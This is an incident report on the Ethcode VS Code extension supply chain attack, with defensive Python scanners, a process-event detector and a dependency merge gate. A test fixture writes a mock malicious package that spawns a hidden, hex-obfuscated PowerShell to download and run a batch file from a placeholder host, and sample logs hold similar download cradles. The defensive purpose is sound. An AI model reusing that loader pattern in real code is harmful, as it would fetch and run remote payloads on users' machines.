Full Report
Cybersecurity researchers have flagged a supply chain attack targeting a Microsoft Visual Studio Code (VS Code) extension called Ethcode that has been installed a little over 6,000 times. The compromise, per ReversingLabs, occurred via a GitHub pull request that was opened by a user named Airez299 on June 17, 2025. First released by 7finney in 2022, Ethcode is a VS Code extension that's used to
Analysis Summary
# Incident Report: VS Code Extension Supply Chain Compromise (Ethcode)
## Executive Summary
A supply chain attack compromised the Microsoft Visual Studio Code extension "Ethcode," which is used to deploy Solidity smart contracts on EVM-based blockchains. The attacker opened a pull request from a throwaway GitHub account that added a malicious npm dependency (`keythereum-utils`) to the project. Once installed, that dependency spawns a hidden PowerShell process to fetch a second-stage payload, most likely intended to steal cryptocurrency assets or tamper with the contracts being developed. Microsoft detected the malicious dependency and removed the extension from the marketplace; it was reinstated after the maintainers purged the dependency.
## Incident Details
- **Discovery Date:** Not stated in the source; between the malicious merge on June 17, 2025 and the maintainer's remediation pull request on June 28, 2025.
- **Incident Date:** Initial malicious commit on June 17, 2025.
- **Affected Organization:** Project maintainers of the Ethcode VS Code extension (Owner: 7finney).
- **Sector:** Software Development Tools / Cryptocurrency Development.
- **Geography:** Global (Affecting users via VS Code Marketplace and GitHub).
## Timeline of Events
### Initial Access
- **Date/Time:** June 17, 2025
- **Vector:** Malicious pull request to the project's GitHub repository, accepted by the maintainer (a supply chain attack through the open-source contribution process; no credential or account compromise is described).
- **Details:** User 'Airez299', whose GitHub account was created the same day, submitted a pull request claiming to "Modernize codebase with viem integration." The PR comprised roughly 43 commits and 4,000 lines of change, which buried the malicious dependency addition inside a large, plausible-looking refactor.
### Execution and Payload Delivery
- **Details:** No lateral movement in the network sense took place; the chain ran entirely on the developer's machine. The PR added the npm package `keythereum-utils` as a dependency in the project's `package.json`. When the extension (and with it the dependency) was installed, the heavily obfuscated dependency code spawned a hidden PowerShell process, which downloaded a second-stage batch script from a public file-hosting service and executed it.
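The behaviour above (an obfuscated npm dependency that spawns a hidden PowerShell to fetch a batch file) can be triaged statically before the code ever runs. The scanner below is an added example, not code from the incident or from the Ethcode project: it walks an installed `node_modules` tree, de-escapes `\xNN`/`\uNNNN` string literals so hex-hidden `powershell` strings are still visible, and flags the spawn-plus-hidden-window-plus-download-cradle combination. The fixture it builds is a constructed stand-in that mimics the reported behaviour; it is not the real contents of `keythereum-utils`, and the `files.example.invalid` URL is a placeholder.

```python
"""Static triage of an npm dependency tree for the keythereum-utils pattern:
obfuscated JavaScript that spawns a hidden PowerShell to fetch a second stage."""
import json
import re
import tempfile
from pathlib import Path

# The only dependency name taken from the incident; everything else is a heuristic.
KNOWN_BAD = {"keythereum-utils"}

# Heuristics run over the raw text plus a de-escaped copy, so a hex-escaped
# "powershell" literal is still matched by the plain-text pattern.
PATTERNS = {
    "child_process": re.compile(r"""require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]"""),
    "powershell": re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?['\"\s,]+hidden|windowsHide\s*:\s*true", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|iex|Invoke-WebRequest|Invoke-Expression|DownloadString|DownloadFile|Start-BitsTransfer)\b", re.I),
    "batch_stage": re.compile(r"\.(?:bat|cmd)\b", re.I),
    "hex_escapes": re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I),   # long runs of \xNN = cheap obfuscation
    "dynamic_eval": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
}
INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}


def deescape(text: str) -> str:
    """Resolve \\xNN and \\uNNNN escapes, a common way to hide strings such as 'powershell'."""
    text = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)


def verdict(name: str, findings: set) -> str:
    if name in KNOWN_BAD:
        return "suspicious"
    # Spawn + hidden window + download cradle is exactly the chain reported here.
    if {"child_process", "hidden_window", "download_cradle"} <= findings:
        return "suspicious"
    return "review" if findings else "clean"


def scan_package(pkg_dir: Path) -> dict:
    """Scan one installed package directory (its own JS files only) and return findings."""
    manifest = json.loads((pkg_dir / "package.json").read_text(encoding="utf-8"))
    findings = set()
    for path in pkg_dir.rglob("*"):
        rel = path.relative_to(pkg_dir).parts
        if not path.is_file() or "node_modules" in rel or path.suffix not in {".js", ".cjs", ".mjs"}:
            continue
        raw = path.read_text(encoding="utf-8", errors="ignore")
        haystack = raw + "\n" + deescape(raw)
        findings.update(name for name, rx in PATTERNS.items() if rx.search(haystack))
    if set(manifest.get("scripts", {})) & INSTALL_HOOKS:
        findings.add("install_hook")          # code that runs at npm install time
    name = manifest.get("name", pkg_dir.name)
    return {"name": name, "version": manifest.get("version", "?"),
            "findings": sorted(findings), "verdict": verdict(name, findings)}


def scan_tree(project_root: Path) -> list:
    """Scan every top-level package under node_modules, scoped packages included."""
    nm = project_root / "node_modules"
    manifests = sorted(nm.glob("*/package.json")) + sorted(nm.glob("@*/*/package.json"))
    return [scan_package(m.parent) for m in manifests]


def check_manifest(manifest_path: Path) -> dict:
    """Flag known-bad names declared in the project's own dependency sections."""
    manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
    declared = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        declared.update(manifest.get(section, {}))
    return {"known_bad": sorted(set(declared) & KNOWN_BAD), "declared": len(declared)}


def build_sample_tree() -> Path:
    """Constructed fixture (NOT the real package contents): one benign package and one
    that mimics the reported spawn-hidden-PowerShell-and-fetch-a-batch-file behaviour."""
    root = Path(tempfile.mkdtemp(prefix="npm-scan-"))
    (root / "package.json").write_text(json.dumps({
        "name": "sample-extension", "version": "0.0.1",
        "dependencies": {"left-pad": "^1.3.0", "keythereum-utils": "^1.0.0"}}))
    benign = root / "node_modules" / "left-pad"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps({"name": "left-pad", "version": "1.3.0"}))
    (benign / "index.js").write_text("module.exports = (s, n, c = ' ') => String(s).padStart(n, c);\n")
    bad = root / "node_modules" / "keythereum-utils"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "keythereum-utils", "version": "1.0.0", "main": "index.js",
        "scripts": {"postinstall": "node index.js"}}))
    (bad / "index.js").write_text(
        "const cp = require('child_process');\n"
        "const h = '\\x70\\x6f\\x77\\x65\\x72\\x73\\x68\\x65\\x6c\\x6c';\n"   # 'powershell', hex-escaped
        "cp.spawn(h, ['-w', 'hidden', '-c', 'iwr https://files.example.invalid/s.bat "
        "-OutFile $env:TEMP\\\\s.bat; & $env:TEMP\\\\s.bat'], {windowsHide: true});\n")
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for r in scan_tree(root):
        print(f"{r['name']}@{r['version']}: {r['verdict']} {r['findings']}")
    print(check_manifest(root / "package.json"))
```

Run this against a real checkout with `scan_tree(Path("."))` after `npm ci`. The `review` verdict is deliberately noisy (any single hit), while `suspicious` requires the full chain or a known-bad name, so a package that merely shells out is not treated like one that shells out, hides the window and downloads a script.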
### Data Exfiltration/Impact
- **Details:** The second-stage payload was not analysed in the public reporting, so its exact function is unknown. Given the target audience, it is believed to be malware that steals cryptocurrency assets or tampers with the smart contracts being developed by users of the extension.
### Detection & Response
- **Details:** Microsoft detected the malicious dependency and removed the Ethcode extension from the VS Code Extensions Marketplace. A project maintainer submitted a pull request on June 28, 2025 removing the malicious dependency, and the extension was reinstated once remediated.
## Attack Methodology
- **Initial Access:** Malicious pull request accepted into the project repository; no theft of maintainer credentials is described.
- **Persistence:** Injection of a malicious npm package (`keythereum-utils`) as a declared dependency, so every subsequent install of the extension pulled it in.
- **Privilege Escalation:** None reported. The chain (Node.js code in the extension host spawning PowerShell, which fetches and runs a batch script) executes with the privileges of the user running VS Code; no elevation step is described.
- **Defense Evasion:** Heavy obfuscation of the `keythereum-utils` code.
- **Credential Access:** Implied goal, likely targeting private keys or tokens related to EVM development.
- **Discovery:** Not described beyond the immediate execution path.
- **Lateral Movement:** N/A; the activity stayed within the developer's environment.
- **Execution / Command and Control:** The obfuscated dependency spawns a hidden PowerShell process that retrieves a second-stage batch script from a public file-hosting service and runs it.
- **Collection:** Not described in public reporting.
- **Exfiltration:** Implied exfiltration of cryptocurrency assets or sensitive development material.
- **Impact:** Potential financial loss (crypto theft) and corruption of source code/contracts.
## Impact Assessment
- **Financial:** Potential cryptocurrency theft from wallets and keys reachable from affected developer machines.
- **Data Breach:** Private keys, API tokens and proprietary smart contract code on the machines of users who installed a compromised build. The extension has roughly 6,000 installs in total; only those who installed or updated it between the June 17 merge and its removal were exposed.
- **Operational:** Minor disruption to developer workflows during the time the extension was unpublished from the marketplace.
- **Reputational:** Damage to the reputation of the Ethcode project and increased scrutiny on the security of EVM development tooling.
## Indicators of Compromise
- **Network Indicators:** The only network behaviour described is retrieval of the second-stage batch script from a public file-hosting service; the source gives no domains, URLs or hashes.
- **File Indicators:** The npm package `keythereum-utils`, published by the npm accounts 0xlab, 0xlabss and 1xlab, and its presence in the `package.json`, lockfile or `node_modules` of any Ethcode build between the June 17 merge and remediation.
- **Behavioral Indicators:** A hidden PowerShell process spawned by the VS Code extension host (Node.js) while the extension is installed or activated, followed by the download and execution of a batch script.
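The behavioural indicator is the most durable of the three, because it survives a rename of the package or a change of hosting. The detection below is an added example, not from the incident report or any vendor rule set: it evaluates process-creation events (Sysmon Event ID 1 field names) and alerts when PowerShell is started by developer tooling with a hidden window, non-interactive flags and a download cradle or dropped script. The parent-process list and the sample events are constructed assumptions, not telemetry from the incident; the `example.invalid` hosts are placeholders.

```python
"""Detection for the behavioural indicator: a hidden PowerShell spawned from a
VS Code / Node process that then fetches and runs a second-stage script."""
import json
import re
from pathlib import PureWindowsPath

# Processes under which a VS Code extension's JavaScript executes on Windows
# (extension host is a child of Code.exe; node.exe covers npm-time execution).
# Assumption for this example, not taken from the incident report.
DEV_HOST_PARENTS = {"code.exe", "code - insiders.exe", "node.exe", "npm.cmd"}
SHELLS = {"powershell.exe", "pwsh.exe"}

HIDDEN = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
NONINTERACTIVE = re.compile(
    r"-(?:nop|noprofile|noni|noninteractive|ep\s+bypass|executionpolicy\s+bypass)", re.I)
CRADLE = re.compile(
    r"\b(?:iwr|iex|Invoke-WebRequest|Invoke-Expression|DownloadString|DownloadFile|Start-BitsTransfer|curl|wget)\b",
    re.I)
SCRIPT_DROP = re.compile(r"\.(?:bat|cmd|ps1|vbs)\b", re.I)


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(image).name.lower()


def score_event(ev: dict):
    """Return an alert dict for one process-creation event, or None if it does not match."""
    child = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    if child not in SHELLS:
        return None
    cmd = ev.get("CommandLine", "")
    reasons = []
    if parent in DEV_HOST_PARENTS:
        reasons.append(f"spawned by developer tooling ({parent})")
    if HIDDEN.search(cmd):
        reasons.append("hidden window")
    if NONINTERACTIVE.search(cmd):
        reasons.append("non-interactive / policy-bypass flags")
    if CRADLE.search(cmd):
        reasons.append("download cradle")
    if SCRIPT_DROP.search(cmd):
        reasons.append("script file written or executed")
    # A PowerShell child of Code.exe on its own is normal (tasks, terminals); require the
    # developer-tool parent plus at least two command-line traits of the reported chain.
    if parent in DEV_HOST_PARENTS and len(reasons) >= 3:
        return {"time": ev.get("UtcTime"), "user": ev.get("User"), "parent": parent,
                "child": child, "reasons": reasons, "cmd": cmd}
    return None


def scan_log(lines: list) -> list:
    """Run score_event over JSON-lines process telemetry and collect alerts."""
    alerts = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if ev.get("EventID") != 1:
            continue
        alert = score_event(ev)
        if alert:
            alerts.append(alert)
    return alerts


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CODE = "C:\\Users\\dev1\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"

# Constructed sample events (Sysmon Event ID 1 field names); not real telemetry.
SAMPLE_LOG = [
    # 1: the reported chain, hidden PowerShell from Code.exe fetching and running a .bat
    json.dumps({"EventID": 1, "UtcTime": "2025-06-20 09:14:03.120", "User": "CORP\\dev1",
                "ParentImage": CODE, "Image": PS,
                "CommandLine": "powershell.exe -w hidden -nop -c \"iwr https://files.example.invalid/s.bat "
                               "-OutFile $env:TEMP\\s.bat; & $env:TEMP\\s.bat\""}),
    # 2: benign integrated-terminal / task usage from the same parent
    json.dumps({"EventID": 1, "UtcTime": "2025-06-20 09:15:40.001", "User": "CORP\\dev1",
                "ParentImage": CODE, "Image": PS,
                "CommandLine": "powershell.exe -NoProfile -c \"Get-ChildItem\""}),
    # 3: hidden download cradle, but not launched from developer tooling
    json.dumps({"EventID": 1, "UtcTime": "2025-06-20 09:16:02.500", "User": "CORP\\dev1",
                "ParentImage": "C:\\Windows\\explorer.exe", "Image": PS,
                "CommandLine": "powershell.exe -w hidden -c \"iwr https://intranet.example.invalid/x.ps1 | iex\""}),
    # 4: not a process-creation event at all
    json.dumps({"EventID": 3, "Image": "C:\\Windows\\System32\\svchost.exe"}),
]

if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["time"], a["user"], a["parent"], "->", a["child"], "|", "; ".join(a["reasons"]))
```

Event 3 is left unalerted on purpose: it is a hidden download cradle from Explorer, which a separate, broader rule should cover; this rule is scoped to the extension-host parent so that it stays quiet on ordinary VS Code terminal and task activity.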
## Response Actions
- **Containment:** Microsoft removed the Ethcode package from the VS Code Extensions Marketplace.
- **Eradication:** Project maintainers formally purged the dependency on the malicious `keythereum-utils` package.
- **Recovery:** The legitimate version of the Ethcode extension was reinstated to the marketplace after verification.
## Lessons Learned
- **Developer Trust Exploitation:** Attackers successfully exploited the implicit trust within the open-source contribution model (GitHub PRs) to introduce malicious code under the guise of legitimate maintenance.
- **Indicator of New Account Activity:** The creation of a throwaway GitHub account on the exact day of the malicious commit should have been a significant red flag.
- **Escalating Threat:** This incident highlights the increasing sophistication of supply chain attacks targeting developer tooling environments to harvest secrets or sabotage applications.
## Recommendations
- Harden review processes for external contributions, especially on projects that have been dormant for long periods: treat a large first-time PR from a newly created account as a red flag rather than a welcome contribution, and review dependency changes in `package.json` separately from the rest of the diff.
- Vet every newly added dependency before merging: check its age, publisher history and source repository, and run automated scanning for obfuscated code and suspicious install-time behaviour (install hooks, child-process spawning, download cradles).
- For cryptocurrency developers, keep machines and wallets used for signing transactions strictly separate from general-purpose development machines, so that a compromised editor extension cannot reach signing keys.
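The second recommendation can be made a merge gate. The script below is an added example rather than anything the Ethcode project runs: it diffs the dependency sections of the base and head `package.json`, then vets each newly added package against a registry metadata snapshot using the signals that would have stood out here (package first published days before the PR, a single maintainer, no repository URL, negligible downloads, and a name that rides on a well-known package such as `keythereum`). The registry snapshot, the maintainer names and the download figures are constructed for the example and are not real npm data; only the dependency name and the PR date come from the incident.

```python
"""Pre-merge dependency gate: diff package.json dependencies and vet new packages."""
from datetime import date, datetime

# Short constructed list of well-known packages in this ecosystem, used for
# look-alike checks; extend with an allow-list of your own approved packages.
KNOWN_POPULAR = {"keythereum", "ethers", "viem", "web3"}


def all_deps(manifest: dict) -> dict:
    out = {}
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        out.update(manifest.get(section, {}))
    return out


def dependency_diff(base: dict, head: dict) -> dict:
    """Added / removed / version-changed dependencies between two manifests."""
    b, h = all_deps(base), all_deps(head)
    return {
        "added": {k: h[k] for k in h if k not in b},
        "removed": sorted(k for k in b if k not in h),
        "changed": {k: (b[k], h[k]) for k in h if k in b and b[k] != h[k]},
    }


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch near-miss names of popular packages."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def vet(name: str, registry: dict, pr_date: date, max_age_days: int = 90) -> list:
    """Return the list of reasons a newly added package should be questioned."""
    meta = registry.get(name)
    if meta is None:
        return ["not present in registry snapshot"]
    reasons = []
    first = datetime.strptime(meta["created"], "%Y-%m-%d").date()
    age = (pr_date - first).days
    if age < max_age_days:
        reasons.append(f"first published only {age} days before the PR")
    if len(meta.get("maintainers", [])) <= 1:
        reasons.append("single maintainer account")
    if not meta.get("repository"):
        reasons.append("no source repository URL")
    if meta.get("weekly_downloads", 0) < 100:
        reasons.append("negligible download count")
    for pop in sorted(KNOWN_POPULAR):
        if name != pop and (name.startswith(pop + "-") or levenshtein(name, pop) <= 2):
            reasons.append(f"name rides on well-known package '{pop}'")
            break
    return reasons


def gate(base: dict, head: dict, registry: dict, pr_date: date, block_at: int = 2) -> dict:
    """Block the merge when any added package accumulates block_at or more reasons."""
    diff = dependency_diff(base, head)
    findings = {n: vet(n, registry, pr_date) for n in diff["added"]}
    blocked = sorted(n for n, r in findings.items() if len(r) >= block_at)
    return {"diff": diff, "findings": findings, "blocked": blocked,
            "decision": "block" if blocked else "pass"}


def run_sample() -> dict:
    """Constructed base/head manifests and registry snapshot (not real npm metadata)."""
    base = {"dependencies": {"ethers": "^5.7.2"}}
    head = {"dependencies": {"ethers": "^5.7.2", "viem": "^2.0.0", "keythereum-utils": "^1.0.2"}}
    registry = {
        "viem": {"created": "2023-02-01", "maintainers": ["maint-a", "maint-b"],
                 "repository": "https://github.com/example/viem", "weekly_downloads": 500000},
        "keythereum-utils": {"created": "2025-06-15", "maintainers": ["publisher-a"],
                             "repository": None, "weekly_downloads": 12},
    }
    return gate(base, head, registry, pr_date=date(2025, 6, 17))


if __name__ == "__main__":
    result = run_sample()
    print(result["decision"], result["blocked"])
    for name, reasons in result["findings"].items():
        print(f"  {name}: {reasons or ['no concerns']}")
```

In CI, feed `gate()` the manifests from the PR's base and head commits and a metadata fetch from the registry; a `block` result should turn the large "modernization" refactor into a conversation about the one line that added an unknown package.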